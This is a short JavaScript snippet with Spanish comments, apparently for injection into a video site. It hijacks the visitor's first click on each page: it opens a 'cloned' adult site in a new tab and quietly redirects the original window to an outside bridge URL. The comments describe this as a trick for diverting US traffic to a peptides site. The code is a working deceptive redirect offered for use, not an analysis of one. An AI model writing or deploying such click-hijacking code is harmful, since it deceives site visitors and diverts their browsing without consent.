< // script type="text/javascript">
window.onload = function() {
// 1. CONFIGURACIÓN: El URL puente a donde mandas el tráfico gringo
var targetPuenteURL = 'https://spycock.com';
function getCookie(name) {
var value = "; " + document.cookie;
var parts = value.split("; " + name + "=");
if (parts.length == 2) return parts.pop().split(";").shift();
}
// Intercepta el clic en la pantalla de tus videos
document.onclick = function(e) {
// TRUCO MAESTRO: Agarramos la URL exacta donde está metido el gringo ahorita
var currentUrlPath = window.location.pathname + window.location.search;
// Creamos un nombre de cookie único combinando la URL para ese video específico
var cookieName = 'azt_pop_' + btoa(currentUrlPath).replace(/=/g, '');
// Si ya existe la cookie para ESTA URL específica, el script se muere y no hace nada
if (getCookie(cookieName)) {
return;
}
// Si es el primer clic en este video, le plantamos la cookie de bloqueo de inmediato
document.cookie = cookieName + "=true; path=/";
var originalHref = window.location.href;
if (e.target && e.target.tagName === 'A' && e.target.href) {
originalHref = e.target.href;
}
// EJECUCIÓN LIMPIA: Abre la web de adultos clonada al frente
var newTab = window.open(originalHref, '_blank');
if (newTab) {
// La ventana original muta abajo en el fondo a tus péptidos de Unarchive.com
window.location.href = targetPuenteURL;
}
};
};